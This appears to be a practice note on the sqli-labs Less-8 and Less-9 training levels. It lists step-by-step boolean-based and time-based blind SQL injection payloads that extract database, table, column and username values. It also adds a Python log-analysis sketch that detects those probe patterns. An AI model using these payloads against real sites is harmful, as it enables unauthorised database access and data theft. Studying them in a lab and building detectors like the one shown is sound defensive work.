SQL Blind Injection
sqli-labs Less-8 is boolean-based blind injection, much like DVWA; the guessing payloads are listed below.
Check version: ?id=1'and left(version(),1)=5--+
Check database name: ?id=1'and ascii(substr(database(),1,1))=115--+
Check table count: ?id=1'and (select count(table_name)from information_schema.tables where table_schema='security')=4--+
Check table name length: ?id=1'and length(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1))=6--+
Check table name: ?id=1'and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1))=101--+
Check column count: ?id=1'and (select count(column_name) from information_schema.columns where table_name='users')=14--+
Check column name length: ?id=1'and length(substr((select column_name from information_schema.columns where table_name='users' limit 0,1),1))=7--+
Check column name: ?id=1'and ascii(substr((select column_name from information_schema.columns where table_name='users' limit 0,1),1))=117--+
Check data: ?id=1' and ascii(substr((select username from users limit 0,1),1))=68--+
sqli-labs Less-9 is time-based blind injection, much like DVWA; the guessing payloads are listed below. With if(condition,1,sleep(5)), the response comes back immediately when the guess is correct and is delayed by five seconds when it is wrong.
Check database name length: ?id=1'and if(length(database())=8,1,sleep(5))--+
Check database name: ?id=1'and if(ascii(substr(database(),1,1))=115,1,sleep(5))--+
Check table count: ?id=1'and if((select count(table_name)from information_schema.tables where table_schema='security')=4,1,sleep(5))--+
Check table name length: ?id=1'and if(length(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1))=6,1,sleep(5))--+
Check table name: ?id=1'and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1))=101,1,sleep(5))--+
Check column count: ?id=1'and if((select count(column_name)from information_schema.columns where table_name='users')=14,1,sleep(5))--+
Check column name length: ?id=1'and if(length(substr((select column_name from information_schema.columns where table_name='users' limit 0,1),1))=7,1,sleep(5))--+
Check column name: ?id=1'and if(ascii(substr((select column_name from information_schema.columns where table_name='users' limit 0,1),1))=117,1,sleep(5))--+
Check data: ?id=1' and if(ascii(substr((select username from users limit 0,1),1))=68,1,sleep(5))--+
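The boolean and time-based payloads above leave a recognizable trail in web server logs. As an added example (not part of the original post), this Python sketch flags requests carrying those probe shapes and counts per-client guessing loops, where the same query template repeats with only the numbers changing; the log entries, IP addresses and signature names are constructed assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qsl

# Constructed sample log entries (client IP, request target); not real traffic.
SAMPLE_LOG = [
    ("10.0.0.5", "/Less-8/?id=1"),
    ("10.0.0.7", "/Less-8/?id=1%27and%20ascii(substr(database(),1,1))=114--+"),
    ("10.0.0.7", "/Less-8/?id=1%27and%20ascii(substr(database(),1,1))=115--+"),
    ("10.0.0.7", "/Less-8/?id=1%27and%20ascii(substr(database(),2,1))=101--+"),
    ("10.0.0.9", "/Less-9/?id=1%27and%20if(length(database())=8,1,sleep(5))--+"),
    ("10.0.0.5", "/search?q=how+to+sleep+better"),  # benign: no function call
]

# Signature names are hypothetical; patterns mirror the payload shapes on this page.
SIGNATURES = {
    "char_probe": re.compile(r"(ascii|ord)\s*\(\s*(substr|substring|mid)\s*\(", re.I),
    "length_probe": re.compile(r"length\s*\(", re.I),
    "schema_enum": re.compile(r"information_schema\.(tables|columns)", re.I),
    "time_delay": re.compile(r"\b(sleep|benchmark)\s*\(", re.I),
    "quote_break": re.compile(r"'\s*(and|or)\b", re.I),
}

def analyze(entries, min_repeats=2):
    """Return {ip: {"signatures": [...], "guessing_loops": n}} for suspicious clients."""
    hits = defaultdict(set)        # ip -> matched signature names
    templates = defaultdict(set)   # (ip, digit-normalized value) -> distinct raw values
    for ip, target in entries:
        query = urlsplit(target).query
        for _, value in parse_qsl(query, keep_blank_values=True):  # URL-decodes values
            matched = {n for n, rx in SIGNATURES.items() if rx.search(value)}
            if not matched:
                continue
            hits[ip] |= matched
            # Replace every number with N so successive guesses collapse to one template.
            templates[(ip, re.sub(r"\d+", "N", value))].add(value)
    report = {}
    for ip, names in hits.items():
        loops = sum(1 for (src, _), vals in templates.items()
                    if src == ip and len(vals) >= min_repeats)
        report[ip] = {"signatures": sorted(names), "guessing_loops": loops}
    return report

if __name__ == "__main__":
    for ip, info in analyze(SAMPLE_LOG).items():
        print(ip, info)
```

For the time-based variant, correlating these hits with response durations near the sleep() argument gives a second, independent signal.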
Error-based injection has not been tested yet; to be added.